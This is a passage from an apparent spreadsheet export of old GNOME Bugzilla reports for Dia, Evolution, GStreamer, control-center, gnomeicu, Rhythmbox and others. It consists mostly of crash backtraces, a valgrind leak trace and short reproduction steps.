/usr/lib/dia/libdia.so
#10 0x0806a138 in display_set_active ()
#11 0x400290d4 in layer_render () from /usr/lib/dia/libdia.so
#12 0x40028faa in data_render () from /usr/lib/dia/libdia.so
#13 0x08068517 in ddisplay_render_pixmap ()
#14 0x0806839e in ddisplay_add_update ()
#15 0x408b11e0 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#16 0x408aeb8a in unblock_source () from /usr/lib/libglib-2.0.so.0
#17 0x408af9b5 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#18 0x408afd48 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#19 0x408b03ee in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#20 0x4039c2b3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#21 0x0808babc in main ()
#22 0x42017499 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 1024 (LWP 31073)):
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4026cca3 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x400d1d65 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4026af75 in pthread_sighandler () from /lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x4002fb9e in dia_font_scaled_ascent () from /usr/lib/dia/libdia.so
No symbol table info available.
#7  0x400581c1 in dia_renderer_set_size () from /usr/lib/dia/libdia.so
No symbol table info available.
#8  0x40c86986 in g_module_check_init () from
/usr/lib/dia/libuml_objects.so
No symbol table info available.
#9  0x400576df in dia_renderer_get_height_pixels () from
/usr/lib/dia/libdia.so
No symbol table info available.
#10 0x0806a138 in display_set_active ()
No symbol table info available.
#11 0x400290d4 in layer_render () from /usr/lib/dia/libdia.so
No symbol table info available.
#12 0x40028faa in data_render () from /usr/lib/dia/libdia.so
No symbol table info available.
#13 0x08068517 in ddisplay_render_pixmap ()
No symbol table info available.
#14 0x0806839e in ddisplay_add_update ()
No symbol table info available.
#15 0x408b11e0 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#16 0x408aeb8a in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#17 0x408af9b5 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x408afd48 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0x408b03ee in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0x4039c2b3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x0808babc in main ()
No symbol table info available.
#22 0x42017499 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6</t>
  </si>
  <si>
    <t>dia-maint</t>
  </si>
  <si>
    <t>andreas1234567</t>
  </si>
  <si>
    <t>GTKHTML-259102</t>
  </si>
  <si>
    <t>Printing</t>
  </si>
  <si>
    <t>Printing out of margins</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 2 (Tettnang)
Package: Evolution
Priority: Normal
Version: GNOME2.6. 1.5.8
Gnome-Distributor: Red Hat Inc
Synopsis: Printing out of margins
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Bugzilla-Version: 1.5.8
Description:
Description of Problem:
Evolution prints text out of page-margins
Steps to reproduce the problem:
1. Print an email with lines that brakes and more than one page
2. Locale is no_NO.ISO-8859-1
3. 
Actual Results:
Lines are printed below margin of page. Half a line is printed on page
one other half is printed on line two
Text is also printed outside right margin
Expected Results:
All text inside page-margins
How often does this happen?
Always
Additional Information:
Unknown reporter: sven.skrivervik@bluecom.no changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>sven.skrivervik</t>
  </si>
  <si>
    <t>EVOLUTION-234288</t>
  </si>
  <si>
    <t>Composer  mail address popup hangs X input when switching windows</t>
  </si>
  <si>
    <t>Description of Problem:
X input hangs (for the most part switching between windows still work)
Happens in sawfisk (Red Hat 8.0 vanilla) have not tried other window
managers.
Steps to reproduce the problem:
1. Press New to compose a new message
2. Begin writing some name in the To: field 
3. Wait untill the box with the list of suggested emails pop up
4. Switch windows in sawfish via the keyboard
5. Strange: The mail popup window appears to be sticky i.e. it appears
   in the next window too. None of the other evi windows appear.
6. Switch back to the orignal window. 
7. Try to select one of the names or do some other mouse button action.
   It is pretty much ignored. In all windows.
8. Swithing to a console window (Alt-Ctrl-F1) and issuing a killev
   restores the situation
9. It happens every time.
Actual Results:
X input hangs no reponse to mouse buttons.
Expected Results:
No hang
How often does this happen? 
Every time I try it
Additional Information:
Please ask...</t>
  </si>
  <si>
    <t>egil</t>
  </si>
  <si>
    <t>GSTREAMER-357212</t>
  </si>
  <si>
    <t>gst-plugins-bad</t>
  </si>
  <si>
    <t>[glimagesink] crashes if no DISPLAY</t>
  </si>
  <si>
    <t>$ DISPLAY='' gdb --args gst-launch-0.10 videotestsrc ! glimagesink
(gdb) run
Starting program: /usr/local/bin/gst-launch-0.10 videotestsrc \! glimagesink
[Thread debugging using libthread_db enabled]
[New Thread -1212909904 (LWP 25000)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1212909904 (LWP 25000)]
0xb78a0aed in XSynchronize () from /usr/lib/libX11.so.6
(gdb) bt
#0  0xb78a0aed in XSynchronize () from /usr/lib/libX11.so.6
#1  0xb7a2fe99 in gst_glimage_sink_init (glimage_sink=0x810c0c8 glimage_sink_class=0x8109e70) at glimagesink.c:186
#2  0xb7eb694a in IA__g_type_create_instance (type=135305256) at gtype.c:1567
#3  0xb7e9da02 in g_object_constructor (type=135305256 n_construct_properties=2 construct_params=0x8071ca8) at gobject.c:1038
#4  0xb7e9bc7b in IA__g_object_newv (object_type=135305256 n_parameters=0 parameters=0x0) at gobject.c:934
#5  0xb7e9c7ef in IA__g_object_new_valist (object_type=135305256 first_property_name=0x0 var_args=) at gobject.c:978
#6  0xb7e9c9a0 in IA__g_object_new (object_type=135305256 first_property_name=0x0) at gobject.c:792
#7  0xb7f0bfbe in gst_element_factory_create (factory=0x8070890 name=0x0) at gstelementfactory.c:381
#8  0xb7f0c773 in gst_element_factory_make (factoryname=0x8094cf0 glimagesink name=0x0) at gstelementfactory.c:444
#9  0xb7f51cd1 in _gst_parse__yyparse (graph=0xbf902c10) at ./grammar.y:573
#10 0xb7f53d26 in _gst_parse_launch (str=0x806b588 videotestsrc ! glimagesink  error=0xbf902fac) at ./grammar.y:838
#11 0xb7f47b78 in gst_parse_launch (pipeline_description=0x806b588 videotestsrc ! glimagesink  error=0xbf902fac) at gstparse.c:159
#12 0xb7f47d84 in gst_parse_launchv (argv=0x804e1e0 error=0xbf902fac) at gstparse.c:121
#13 0x0804af03 in main (argc=Cannot access memory at address 0x1
) at gst-launch.c:645
(gdb)</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-34820</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER</t>
  </si>
  <si>
    <t>Crash..</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  
Synopsis: Crash..
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.5
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-8_helix_1
gnome-core: gnome-core 1.2.4
Description:
It doesn't seem to like certain wave files.
Debugging information:
(no debugging symbols found)...
Core was generated by `sound-properties --id=7 --xid=41947823'.
Program terminated with signal 6 Aborted.
(no debugging symbols found)...#0  0x404ce4e1 in __kill () from /lib/libc.so.6
#0  0x404ce4e1 in __kill () from /lib/libc.so.6
#1  0x404ce2ba in raise (sig=6) at ../sysdeps/posix/raise.c:27
#2  0x404cfa82 in abort () at ../sysdeps/generic/abort.c:88
#3  0x404c7eba in __assert_fail () at assert.c:60
#4  0x4048eb92 in ParseFormat (filehandle=0x80f7908 fp=0x80ed720 
    id=544501094 size=50) at wave.c:64
#5  0x4048ef6d in _af_parsewave (file=0x80f7908) at wave.c:165
#6  0x40486600 in afOpenVirtualFile (vfile=0x80ed720 mode=0x40473140 r 
    setup=0x0) at audiofile.c:454
#7  0x404866cb in afOpenFile (
    filename=0x80eda10 /usr/share/sounds/ruri/Nyao3.wav 
    mode=0x40473140 r setup=0x0) at audiofile.c:488
#8  0x4046f9f6 in gnome_sound_sample_load_audiofile ()
   from /usr/lib/libgnome.so.32
#9  0x4046fb8c in gnome_sound_sample_load () from /usr/lib/libgnome.so.32
#10 0x4046fccc in gnome_sound_play () from /usr/lib/libgnome.so.32
#11 0x804c65b in main ()
#12 0x402a39e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#13 0x402d5d4a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#14 0x402d508d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#15 0x402d2e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#16 0x4023b98d in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#17 0x4023d1ed in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#18 0x402a39e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#19 0x402d4f18 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#20 0x402d2e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x4023b8bd in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#22 0x4023cad7 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#23 0x402a36ae in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#24 0x402d50cc in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#25 0x402d2e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#26 0x4030d229 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#27 0x402a3625 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#28 0x402a26ef in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#29 0x40358c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#30 0x40089987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#31 0x4008a001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#32 0x4008a1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#33 0x402a1f87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#34 0x40023635 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#35 0x40022f47 in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#36 0x804af6b in main ()
#37 0x404bdb65 in __libc_start_main (main=0x804ad40  argc=3 
    ubp_av=0xbffff9d4 init=0x804a33c  fini=0x804ca9c  
    rtld_fini=0x4000df24  stack_end=0xbffff9cc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x404ce4e1 in __kill () from /lib/libc.so.6
No locals.
#1  0x404ce2ba in raise (sig=6) at ../sysdeps/posix/raise.c:27
No locals.
#2  0x404cfa82 in abort () at ../sysdeps/generic/abort.c:88
act = {__sigaction_handler = {sa_handler = 0xbfffe9e0 
    sa_sigaction = 0xbfffe9e0} sa_mask = {__val = {1073796952 1078469912 
      1079858864 7 0 1078469576 225011984 3221219840 1073796952 
      1079779100 1079083902 1078644684 1073833528 1078469576 225011984 
      3221219872 1073796952 1078469912 1079858864 7 0 3221219864 
      1079047938 1079769536 1079722208 1079777908 1078658216 1078623884 
      1079777316 1079769700 135191056 3221219928}} sa_flags = 1073797360 
  sa_restorer = 0}
sigs = {__val = {32 0 }}
__cnt = 1079777316
#3  0x404c7eba in __assert_fail () at assert.c:60
function = 0x405c1824 @\003\022
#4  0x4048eb92 in ParseFormat (filehandle=0x80f7908 fp=0x80ed720 
    id=544501094 size=50) at wave.c:64
formatTag = 2
channelCount = 1
sampleRate = 4
averageBytesPerSecond = 3221219988
blockAlign = 16385
bitsPerSample = 26168
#5  0x4048ef6d in _af_parsewave (file=0x80f7908) at wave.c:165
165	in wave.c
type = 1179011410
size = 5202
formtype = 1163280727
index = 4
hasFormat = 0
hasData = 0
chunkid = 544501094
chunksize = 50
#6  0x40486600 in afOpenVirtualFile (vfile=0x80ed720 mode=0x40473140 r 
    setup=0x0) at audiofile.c:454
filehandle = 0x80f7908
data = RIFFR\024\000\000WAVE
#7  0x404866cb in afOpenFile (
    filename=0x80eda10 /usr/share/sounds/ruri/Nyao3.wav 
    mode=0x40473140 r setup=0x0) at audiofile.c:488
488	in audiofile.c
fp = (FILE *) 0x80ee4e0
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:45 -------
This bug was previously known as bug 34820 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=34820
Originally filed under the control-center product and general component.
The original reporter (jeminer@lycos.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>control-center-maint</t>
  </si>
  <si>
    <t>jeminer</t>
  </si>
  <si>
    <t>EVOLUTION-523191</t>
  </si>
  <si>
    <t>Show categories drop-down list isn't updated when categories change</t>
  </si>
  <si>
    <t>Please describe the problem:
When you edit categories (add or remove one) in a task or memo details dialog this change isn't reflected in the Show categories drop-down list in tasks or memo view until you restart Evolution. The change is immediately reflected in Contacts view though. 
Steps to reproduce:
1. Create a new category in tasks or memos
2. Confirm that the new category isn't available in the drop-down list in memos or tasks view. 
3. Restart Evolution
4. Confirm that it is now available from the list.
Actual results:
Expected results:
I would expect the change to be reflected immediately. 
Does this happen every time?
yes. 
Other information:</t>
  </si>
  <si>
    <t>joerlend.schinstad</t>
  </si>
  <si>
    <t>GTKVTS-82180</t>
  </si>
  <si>
    <t>gtkvts</t>
  </si>
  <si>
    <t>GTKVTS</t>
  </si>
  <si>
    <t>GtkTreeViewColumn Functionality test fails on Solaris platform(s)</t>
  </si>
  <si>
    <t>While testing gtkvts (snapshot May 15th 2002) on Solaris 9 Solaris 8 and 
Red Hat Linux 7.1 running Gnome 2.0 (May 15th snapshot of CVS) observed 
that 1 test of GtkTreeViewColumn failed/unresolved on Solaris systems. 
This test successfully passed on Red Hat Linux 7.1
The o/p of test failure on Solaris 8 and Solaris 9 is given below.
-----------------------------------------
200|0 38 18:29:28|TP Start
520|0 38 00019321 1 1|test case: ./GtkTreeViewColumn TP number: 38
520|0 38 00019321 1 2|unexpected signal 10 (unknown signal) received
220|0 38 2 18:29:28|UNRESOLVED</t>
  </si>
  <si>
    <t>tvv</t>
  </si>
  <si>
    <t>satish.hegde</t>
  </si>
  <si>
    <t>GNOME-SESSION-335382</t>
  </si>
  <si>
    <t>gnome-session</t>
  </si>
  <si>
    <t>GNOME-SESSION</t>
  </si>
  <si>
    <t>Leak in gsm-xrandr.c</t>
  </si>
  <si>
    <t>==2409== 135 bytes in 4 blocks are definitely lost in loss record 69 of 104
==2409==    at 0x4004F82: malloc (vg_replace_malloc.c:149)
==2409==    by 0x4989155: g_malloc (gmem.c:131)
==2409==    by 0x499BE18: g_strdup (gstrfuncs.c:91)
==2409==    by 0x4899C09: set_string (gconf-value.c:55)
==2409==    by 0x489AE2F: gconf_value_copy (gconf-value.c:731)
==2409==    by 0x48A3D51: gconf_client_get_full (gconf-client.c:1297)
==2409==    by 0x48A47AD: gconf_client_get_string (gconf-client.c:1485)
==2409==    by 0x8059A4C: gsm_set_display_properties (gsm-xrandr.c:28)
==2409==    by 0x805324B: main (main.c:373)
Attaching a patch.</t>
  </si>
  <si>
    <t>gnome-session-maint</t>
  </si>
  <si>
    <t>EPIPHANY-145229</t>
  </si>
  <si>
    <t>Interface</t>
  </si>
  <si>
    <t>Popup blocker GUI consistency</t>
  </si>
  <si>
    <t>We currently have:
- Menu: View -&gt; Popup Windows
- Preference:  Privacy -&gt; Allow popup windows
- Tooltip: %d hidden popup windows
As marco mentioned in bug #111930 we should make sure that these terminologies
are consistent.</t>
  </si>
  <si>
    <t>GIMP-159051</t>
  </si>
  <si>
    <t>Make gimp_displays_reconnect() take over the new image's initial refcount</t>
  </si>
  <si>
    <t>As discussed on gimp-developer there is a problem with
gimp_displays_reconnect() which causes the new image
to be leaked. To properly fix this IMHO the following
changes need to be done:
(1) work as documented (fail if the new image already has a display).
(2) also fail if the old image has no display.
(3) make it take over the reference count on success.</t>
  </si>
  <si>
    <t>LIBZVT-83400</t>
  </si>
  <si>
    <t>LIBZVT</t>
  </si>
  <si>
    <t>lbzvt update broke vi :/</t>
  </si>
  <si>
    <t>recent libzvt update and a rebuild of gnome-terminal after that makes
gnome-terminal pretty much unusable in vim
whenever I'm using arrow keys I get :
E388: Couldn't find definition
Switching back to aterm for now too bad :/</t>
  </si>
  <si>
    <t>spider.bugs</t>
  </si>
  <si>
    <t>GSTREAMER-164197</t>
  </si>
  <si>
    <t>[pngdec] &amp; [pngenc] The decoded image is in RGB(LE) byte order</t>
  </si>
  <si>
    <t>Get a 32bit (RGBA) image and run the following command:
gst-launch filesrc blocksize=100000 location=eye.png ! pngdec ! ffmpegcolorspace
! video/x-raw-rgbbpp=(int)24depth=(int)24 ! pngenc ! filesink location=eye2.png
The result will have inverted R and B channels. For some reason inserting an
alphacolor into the pipeline before ffmpegcolorspace makes the problem go away.
Another interesting thing to note is that when launched like this pngdec's
srcpad will fixate to bpp=24depth=24 which is bogus as the image is
bpp=32depth=32. That's another bug though. (Why the image does not get
horribly distorted by this is beyond me)
As for the fix... Most probably the red_mask and blue_mask properties of
pngdec's source pad should be exchanged when neccessary. Question is how do I
change those and how do I detect I need to? (fortunately PNG is always in
network byte order)
Another option is to use png_set_bgr(pngdec-&gt;png) on little-endian systems so
libpng does not perform the MSB-&gt;LSB conversion itself and the default values
for red_mask and green_mask are ok. I'll look into libpng if there is a way to
tell it that it should not modify the byte order at all.. That would be best.</t>
  </si>
  <si>
    <t>algernon</t>
  </si>
  <si>
    <t>GNOMEICU-434362</t>
  </si>
  <si>
    <t>GNOMEICU</t>
  </si>
  <si>
    <t>can not delete empty group</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Add group Test
2. Delete group Test
Stack trace:
*** glibc detected *** gnomeicu: free(): invalid pointer: 0x08206498 ***
======= Backtrace: =========
/lib/libc.so.6[0xb6e9c6e1]
/lib/libc.so.6(cfree+0x89)[0xb6e9dd79]
/opt/gnome/lib/libglib-2.0.so.0(g_free+0x31)[0xb72410d1]
gnomeicu[0x8066ab6]
/opt/gnome/lib/libgobject-2.0.so.0(g_cclosure_marshal_VOID__VOID+0x49)[0xb72bd0b9]
/opt/gnome/lib/libgobject-2.0.so.0(g_closure_invoke+0x12b)[0xb72afc0b]
/opt/gnome/lib/libgobject-2.0.so.0[0xb72c0d3d]
/opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x8c7)[0xb72c2247]
/opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit+0x35)[0xb72c2415]
/opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_button_clicked+0x53)[0xb74cc043]
/opt/gnome/lib/libgtk-x11-2.0.so.0[0xb74cdc8e]
/opt/gnome/lib/libgobject-2.0.so.0(g_cclosure_marshal_VOID__VOID+0x49)[0xb72bd0b9]
/opt/gnome/lib/libgobject-2.0.so.0[0xb72ae407]
/opt/gnome/lib/libgobject-2.0.so.0(g_closure_invoke+0x12b)[0xb72afc0b]
/opt/gnome/lib/libgobject-2.0.so.0[0xb72c11ca]
/opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x8c7)[0xb72c2247]
/opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit+0x35)[0xb72c2415]
/opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_button_released+0x53)[0xb74cc0d3]
/opt/gnome/lib/libgtk-x11-2.0.so.0[0xb74cc131]
/opt/gnome/lib/libgtk-x11-2.0.so.0[0xb759c1b0]
/opt/gnome/lib/libgobject-2.0.so.0[0xb72ae407]
/opt/gnome/lib/libgobject-2.0.so.0(g_closure_invoke+0x12b)[0xb72afc0b]
/opt/gnome/lib/libgobject-2.0.so.0[0xb72c1383]
/opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x68f)[0xb72c200f]
/opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit+0x35)[0xb72c2415]
/opt/gnome/lib/libgtk-x11-2.0.so.0[0xb76afb18]
/opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_propagate_event+0x183)[0xb7595653]
/opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_main_do_event+0x317)[0xb7596857]
/opt/gnome/lib/libgdk-x11-2.0.so.0[0xb742a02a]
/opt/gnome/lib/libglib-2.0.so.0(g_main_context_dispatch+0x182)[0xb7239de2]
/opt/gnome/lib/libglib-2.0.so.0[0xb723ce1f]
/opt/gnome/lib/libglib-2.0.so.0(g_main_loop_run+0x1a9)[0xb723d1c9]
/opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_main+0xb4)[0xb7596cd4]
gnomeicu(main+0x4c0)[0x8065140]
/lib/libc.so.6(__libc_start_main+0xdc)[0xb6e4df9c]
gnomeicu[0x80585c1]
======= Memory map: ========
08048000-0809c000 r-xp 00000000 fe:00 1096768    /opt/gnome/bin/gnomeicu
0809c000-0809d000 r--p 00053000 fe:00 1096768    /opt/gnome/bin/gnomeicu
0809d000-0809f000 rw-p 00054000 fe:00 1096768    /opt/gnome/bin/gnomeicu
0809f000-08253000 rw-p 0809f000 00:00 0          [heap]
b6900000-b6921000 rw-p b6900000 00:00 0
b6921000-b6a00000 ---p b6921000 00:00 0
b6ae7000-b6af1000 r-xp 00000000 fe:00 848954     /lib/libgcc_s.so.1
b6af1000-b6af3000 rw-p 00009000 fe:00 848954     /lib/libgcc_s.so.1
b6b20000-b6b26000 r-xp 00000000 fe:00 1032545    /opt/gnome/lib/gtk-2.0/2.10.0/immodules/im-xim.so
b6b26000-b6b28000 rw-p 00005000 fe:00 1032545    /opt/gnome/lib/gtk-2.0/2.10.0/immodules/im-xim.so
b6b28000-b6b29000 rw-p b6b28000 00:00 0
b6b29000-b6b5e000 r--s 00000000 fe:00 1159517    /var/run/nscd/dboQ9OH9 (deleted)
b6b5e000-b6bbe000 rw-s 00000000 00:07 17039370   /SYSV00000000 (deleted)
b6bbe000-b6c04000 r--p 00000000 fe:00 359861     /usr/share/fonts/truetype/arialbd.ttf
b6c04000-b6c48000 r--p 00000000 fe:00 359992     /usr/share/fonts/truetype/arial.ttf
b6c48000-b6c4a000 r-xp 00000000 fe:00 1033002    /opt/gnome/lib/pango/1.5.0/modules/pango-basic-fc.so
b6c4a000-b6c4c000 rw-p 00001000 fe:00 1033002    /opt/gnome/lib/pango/1.5.0/modules/pango-basic-fc.so
b6c4c000-b6c56000 r--s 00000000 fe:00 1159742    /var/cache/fontconfig/77e41c5059666d75f92e318d4be8c21e-x86.cache-2
b6c56000-b6c59000 r--s 00000000 fe:00 1159387    /var/cache/fontconfig/829d941efc342f259e12320326ddb876-x86.cache-2
b6c59000-b6c5a000 r--s 00000000 fe:00 1159383    /var/cache/fontconfig/b6bbb9f898b73777cfe763014a8c08d3-x86.cache-2
b6c5a000-b6c5f000 r--s 00000000 fe:00 1159384    /var/cache/fontconfig/d62e99ef547d1d24cdb1bd22ec1a2976-x86.cache-2
b6c5f000-b6cc3000 r--s 00000000 fe:00 1159663    /var/cache/fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-x86.cache-2
b6cc3000-b6ced000 r--s 00000000 fe:00 1159652    /var/cache/fontconfig/8d4
Other information:
in the previous version there was similar problem with g_free
the latest svn does not solve the problem</t>
  </si>
  <si>
    <t>gnomeicu-maint</t>
  </si>
  <si>
    <t>deloptes</t>
  </si>
  <si>
    <t>RHYTHMBOX-344875</t>
  </si>
  <si>
    <t>DAAP</t>
  </si>
  <si>
    <t>crash when exiting while playing from daap source</t>
  </si>
  <si>
    <t>There is a crash when exiting while playing from daap source.
1. Play a song from a remote DAAP source
2. Exit RB
Backtrace was generated from '/opt/gnome/bin/rhythmbox'
Using host libthread_db library /lib/libthread_db.so.1.
`shared object read from target memory' has disappeared keeping its symbols.
[Thread debugging using libthread_db enabled]
[New Thread -1208723760 (LWP 2724)]
[New Thread 50383776 (LWP 2904)]
[New Thread -1236948064 (LWP 2780)]
[New Thread 91507616 (LWP 2735)]
[New Thread 130821024 (LWP 2726)]
0x00abe402 in __kernel_vsyscall ()
#0  0x00abe402 in __kernel_vsyscall ()
#1  0x005e2c0b in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x002f88dd in libgnomeui_segv_handle (signum=5) at gnome-ui-init.c:812
#3  
#4  IA__g_logv (log_domain=) at gmessages.c:503
#5  0x042a0d19 in IA__g_log (log_domain=0xe577e8 GStreamer 
    log_level=G_LOG_LEVEL_CRITICAL 
    format=0x42caf5b %s: assertion `%s' failed) at gmessages.c:517
#6  0x042a0dfb in IA__g_return_if_fail_warning (
    log_domain=0xe577e8 GStreamer 
    pretty_function=0xe649a3 gst_element_make_from_uri 
    expression=0xe64749 gst_uri_is_valid (uri)) at gmessages.c:532
#7  0x00e3b64a in gst_element_make_from_uri (type=GST_URI_SRC 
    uri=0x8ab4a60  :Â§\b\200\201\224\b92.168.0.2:3689/databases/36/items/40.mp3?session-id=123655000 elementname=0x2014c05 source) at gsturi.c:517
#8  0x0200f5a3 in gst_play_base_bin_change_state (element=0x8a6e038 
    transition=GST_STATE_CHANGE_READY_TO_PAUSED) at gstplaybasebin.c:1274
#9  0x0200a5e0 in gst_play_bin_change_state (element=0x8a6e038 
    transition=GST_STATE_CHANGE_READY_TO_PAUSED) at gstplaybin.c:1388
#10 0x00e0afe8 in gst_element_change_state (element=0x8a6e038 
    transition=GST_STATE_CHANGE_READY_TO_PAUSED) at gstelement.c:2183
#11 0x00e0e038 in gst_element_set_state_func (element=0x8a6e038 
    state=GST_STATE_PAUSED) at gstelement.c:2145
#12 0x00e0a183 in gst_element_set_state (element=0x8a6e038 
    state=GST_STATE_PAUSED) at gstelement.c:2055
#13 0x080ef2ca in rb_player_gst_sync_pipeline (mp=0x81ad1d8)
    at rb-player-gst.c:601
#14 0x080f01c5 in rb_player_gst_open (player=0x81ad1d8 
    uri=0x87c6100  :Â§\b\200\201\224\b92.168.0.2:3689/databases/36/items/40.mp3?session-id=123655000 error=0xbfc68958) at rb-player-gst.c:737
#15 0x080ecc51 in rb_player_open (player=0x81ad1d8 
    uri=0x87c6100  :Â§\b\200\201\224\b92.168.0.2:3689/databases/36/items/40.mp3?session-id=123655000 error=0xbfc68958) at rb-player.c:122
#16 0x0807888c in rb_shell_player_set_playing_entry (player=0x82d3000 
    entry=0x89481a0 out_of_order=) at rb-shell-player.c:1018
#17 0x0807992b in rb_shell_player_play_entry (player=0x82d3000 
    entry=0x89481a0) at rb-shell-player.c:1563
#18 0x080892db in do_next_idle_cb (data=0x8b49650) at rb-play-order.c:596
#19 0x04296801 in g_idle_dispatch (source=0x8a14998 
    callback=0x80892b0  user_data=0x8b49650) at gmain.c:3796
#20 0x042981bd in IA__g_main_context_dispatch (context=0x820d650)
    at gmain.c:1916
#21 0x0429b43f in g_main_context_iterate (context=0x820d650 block=1 
    dispatch=1 self=0x819e8e8) at gmain.c:2547
#22 0x0429b9a5 in IA__g_main_context_iteration (context=0x820d650 
    may_block=1) at gmain.c:2606
#23 0x010fbdc4 in IA__gtk_main_iteration () at gtkmain.c:1082
#24 0x080a730b in rb_daap_source_disconnect (daap_source=0x8795840)
    at rb-daap-source.c:914
#25 0x080a7c61 in remove_source (source=0x8795840) at rb-daap-source.c:402
#26 0x0428b9e6 in g_hash_nodes_destroy (hash_node=0x868fe60 
    key_destroy_func=0x429f750  
    value_destroy_func=0x80a7bf0 ) at ghash.c:783
#27 0x0428be34 in IA__g_hash_table_remove_all (hash_table=0x8381c00)
    at ghash.c:468
#28 0x0428c093 in IA__g_hash_table_destroy (hash_table=0x8381c00)
    at ghash.c:221
#29 0x080a6bdb in stop_browsing (shell=0x82d0018) at rb-daap-source.c:457
#30 0x080a6d82 in rb_daap_sources_shutdown (shell=0x82d0018)
    at rb-daap-source.c:637
#31 0x0806fb8f in rb_shell_quit (shell=0x82d0018 error=0x0)
    at rb-shell.c:2423
#32 0x0806fd02 in rb_shell_window_delete_cb (win=0x82ca000 event=0x8bbcd90 
    shell=0x82d0018) at rb-shell.c:1582
#33 0x01102408 in _gtk_marshal_BOOLEAN__BOXED (closure=0x82ca8c0 
    return_value=0xbfc68e10 n_param_values=2 param_values=0xbfc68f1c 
    invocation_hint=0xbfc68dfc marshal_data=0x806fcd0) at gtkmarshalers.c:83
#34 0x0060af4b in IA__g_closure_invoke (closure=0x82ca8c0 
    return_value=0xbfc68e10 n_param_values=2 param_values=0xbfc68f1c 
    invocation_hint=0xbfc68dfc) at gclosure.c:490
#35 0x0061c8c1 in signal_emit_unlocked_R (node=0x819c7e0 detail=0 
    instance=0x82ca000 emission_return=0xbfc690dc 
    instance_and_params=0xbfc68f1c) at gsignal.c:2508
#36 0x0061d8f6 in IA__g_signal_emit_valist (instance=0x82ca000 signal_id=64 
    detail=0 var_args=0xbfc69160 x\221Ã†Â¿\220ÃÂ»\b) at gsignal.c:2207
